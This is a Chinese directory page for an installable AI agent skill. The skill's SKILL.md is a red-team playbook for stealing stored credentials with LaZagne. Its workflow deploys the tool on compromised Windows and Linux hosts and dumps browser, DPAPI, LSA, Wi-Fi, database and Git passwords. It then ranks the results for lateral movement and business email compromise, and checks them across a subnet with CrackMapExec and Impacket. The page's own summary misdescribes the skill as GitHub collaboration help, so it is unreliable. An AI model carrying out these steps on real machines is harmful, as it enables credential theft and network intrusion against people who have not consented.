Token导航 LogoToken导航TokenDH.com
运维和基础设施敏感数据github未标认证来源可访问许可证需确认审计异常

performing-credential-access-with-lazagne使用 lazagne 执行凭证访问

Agent Skill

performing-credential-access-with-lazagne 用于处理 GitHub 仓库、Issue、Pull Request 和代码协作信息,适合在 Codex、Claude、Cursor、Gemini CLI 中需要围绕仓库状态、代码变更或协作事项进行整理时使用。可结合来源仓库、安装命令和原始 README 继续核验具体用法。安装前建议确认权限范围、维护状态,以及是否会触发联网、命令执行或文件读写。

总安装

194

周安装

8

GitHub Stars

5,863

下载量

63
CodexClaudeCursorGemini CLI

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

GitHub

来源数

2

许可证

unknown

最后核验

2026-05-01

来源状态

来源可访问

安装方式

通过对话安装

复制提示词发给支持本地命令或 Skills 的 AI 助手,先确认命令和权限,再让它执行。

请帮我安装这个 Agent Skill:performing-credential-access-with-lazagne(使用 lazagne 执行凭证访问)
来源仓库:https://github.com/mukul975/anthropic-cybersecurity-skills
仓库路径:skills/performing-credential-access-with-lazagne
安装命令:
npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill performing-credential-access-with-lazagne
安装前请先检查当前环境是否支持对应 CLI,并向我确认将要执行的命令、安装目录、联网范围和文件读写权限;确认后再执行。

命令行安装

复制命令到本机终端执行。该命令会通过 npx skills 从第三方来源获取 Skill;本站只展示命令,不托管安装包,也不自动执行。

skills.shnpx skills
npx skills add https://github.com/mukul975/anthropic-cybersecurity-skills --skill performing-credential-access-with-lazagne

简介

用于处理 GitHub 仓库、Issue 和 Pull Request 协作信息。

  • 适合在 Codex、Claude、Cursor、Gemini CLI 中整理代码变更或协作事项。
  • 可结合来源仓库 README 继续核验具体用法,建议确认维护状态。
  • 安装前需注意是否会触发联网、命令执行或文件读写操作。
  • performing-credential-access-with-lazagne 属于运维和基础设施类 Skill,可作为该场景下的辅助能力补充。

SKILL.md

Performing Credential Access with LaZagne

Overview

LaZagne is an open-source post-exploitation tool designed to retrieve credentials stored on local systems. It supports Windows, Linux, and macOS, with the most extensive module library for Windows. LaZagne recovers passwords from browsers (Chrome, Firefox, Edge, Opera), email clients (Outlook, Thunderbird), databases (PostgreSQL, MySQL, SQLite), system stores (Windows Credential Manager, LSA secrets, DPAPI), Wi-Fi profiles, Git credentials, and dozens of other applications. The tool is categorized under MITRE ATT&CK T1555 (Credentials from Password Stores) and is listed as software S0349. Red teams use LaZagne after gaining initial access to harvest stored credentials that enable lateral movement and privilege escalation.

When to Use

  • When conducting security assessments that involve performing credential access with lazagne
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Deploy LaZagne on compromised Windows, Linux, or macOS endpoints
  • Extract credentials from all supported password stores
  • Parse and prioritize recovered credentials for lateral movement
  • Identify high-value credentials (domain admin, service accounts, cloud access)
  • Document credential harvesting results with appropriate evidence handling
  • Correlate recovered credentials with BloodHound attack paths

MITRE ATT&CK Mapping

  • T1555 - Credentials from Password Stores
  • T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
  • T1555.004 - Credentials from Password Stores: Windows Credential Manager
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1552.002 - Unsecured Credentials: Credentials in Registry
  • T1003.004 - OS Credential Dumping: LSA Secrets
  • T1539 - Steal Web Session Cookie

Workflow

Phase 1: LaZagne Deployment

  1. Transfer LaZagne to the compromised host: # Pre-compiled executable (Windows) # Transfer lazagne.exe via C2 channel or file upload # Python version (requires Python on target) git clone https://github.com/AlessandroZ/LaZagne.git cd LaZagne pip install -r requirements.txt
  2. Verify execution capability and privileges: # Check current user context whoami /priv # LaZagne works with standard user privileges for user-level stores # SYSTEM/Admin privileges needed for DPAPI master keys, LSA secrets, SAM

Phase 2: Full Credential Extraction (Windows)

  1. Run LaZagne with all modules: # Extract all credentials lazagne.exe all # Export results to JSON lazagne.exe all -oJ # Export results to specific file lazagne.exe all -oJ -output C:\Temp\creds
  2. Run specific modules for targeted extraction: # Browsers only (Chrome, Firefox, Edge, Opera, IE) lazagne.exe browsers # Windows credential stores lazagne.exe windows # Database credentials lazagne.exe databases # Email client credentials lazagne.exe mails # Wi-Fi passwords lazagne.exe wifi # Git credentials lazagne.exe git # System credentials (requires elevated privileges) lazagne.exe sysadmin

Phase 3: Credential Extraction (Linux)

  1. Run LaZagne on Linux targets: # Full extraction python3 laZagne.py all # Browser credentials python3 laZagne.py browsers # System credentials (SSH keys, shadow file with root) python3 laZagne.py sysadmin # Database credentials python3 laZagne.py databases # Git credentials python3 laZagne.py git

Phase 4: Credential Analysis and Prioritization

  1. Parse JSON output for unique credentials: import json with open("creds.json") as f: results = json.load(f) for module in results: for entry in module.get("results", []): print(f"Source: {entry.get('Category')}") print(f" User: {entry.get('Login', 'N/A')}") print(f" URL/Host: {entry.get('URL', entry.get('Host', 'N/A'))}")
  2. Prioritize credentials by value:

- Domain credentials (AD accounts) for lateral movement - Cloud service credentials (AWS, Azure, GCP console) - VPN and remote access credentials - Database credentials for data access - Email credentials for business email compromise - Service account credentials for privilege escalation

Phase 5: Credential Validation and Use

  1. Validate recovered domain credentials: # Test domain credentials with CrackMapExec crackmapexec smb 10.10.10.0/24 -u recovered_user -p 'recovered_pass' # Test with Impacket smbclient.py domain.local/user:'password'@10.10.10.1
  2. Cross-reference with BloodHound paths for high-value targets
  3. Use recovered credentials for lateral movement or privilege escalation

Tools and Resources

ToolPurposePlatform
LaZagneMulti-source credential extractionWindows/Linux/macOS
MimikatzLSASS/DPAPI credential dumpingWindows
SharpChromeChrome credential extraction (.NET)Windows
SharpDPAPIDPAPI credential decryptionWindows
CrackMapExecCredential validation and sprayingLinux
ImpacketRemote credential testingLinux (Python)

LaZagne Module Coverage (Windows)

CategoryModules
BrowsersChrome, Firefox, Edge, Opera, IE, Brave, Vivaldi
EmailOutlook, Thunderbird, Foxmail
DatabasesPostgreSQL, MySQL, SQLiteDB, Robomongo
SysadminPuTTY, WinSCP, FileZilla, OpenSSH, RDPManager
WindowsCredential Manager, Vault, DPAPI, Autologon
WiFiStored Wi-Fi passwords
GitGit Credential Store, Git Credential Manager
SVNTortoiseSVN
ChatPidgin, Skype

Detection Signatures

IndicatorDetection Method
LaZagne.exe process executionEDR process monitoring with hash-based detection
Access to Chrome Login Data SQLite DBFile access monitoring on browser credential stores
DPAPI CryptUnprotectData API callsAPI hooking and ETW tracing
Access to Windows Credential ManagerEvent 5379 (Credential Manager read)
Mass credential store enumerationBehavioral analysis for sequential access patterns
Python interpreter accessing credential filesScript block logging and file access auditing

Validation Criteria

  • LaZagne deployed on compromised endpoint
  • Full credential extraction completed (all modules)
  • Credentials exported in JSON format for analysis
  • Recovered credentials parsed and deduplicated
  • High-value credentials identified and prioritized
  • Domain credentials validated against AD
  • Lateral movement opportunities identified from recovered creds
  • Evidence documented with appropriate handling procedures

适合场景

01

用户想查找某类 Agent Skill 时

02

需要根据任务场景推荐可安装能力包时

03

需要对比不同来源的安装命令和来源信息时

能力概览

能力 1

按任务关键词查找相关 Skills

能力 2

展示可复制的安装命令

能力 3

保留来源站点、仓库和原始说明,方便继续核验

能力 4

展示第三方安全扫描或审计结果

安装后应在对应宿主中按原始 README 的触发条件使用;具体调用方式请以来源页面和 README 为准。

平台分布

Codex

35.15%
按下载量换算22

Claude

28.22%
按下载量换算18

Cursor

18.94%
按下载量换算12

Gemini CLI

9.43%
按下载量换算6

安全审计

Gen Agent Trust Hub

可疑

Socket

未通过

Snyk

未通过

权限和风险

敏感数据

该 Skill 可能接触密钥、Token、环境变量或敏感配置,应进入高风险复核队列,默认不自动发布。

安装前确认

本站仅展示第三方公开信息,不托管安装包,不提供自动安装或运行环境。安装前应自行审查源码、依赖和命令行为。来源安全扫描存在 warning/failed 结果,不能写成本站确认安全。当前只有一个来源,正式发布前建议补源仓库或其他目录站核验。

来源信息

继续浏览同类 Skills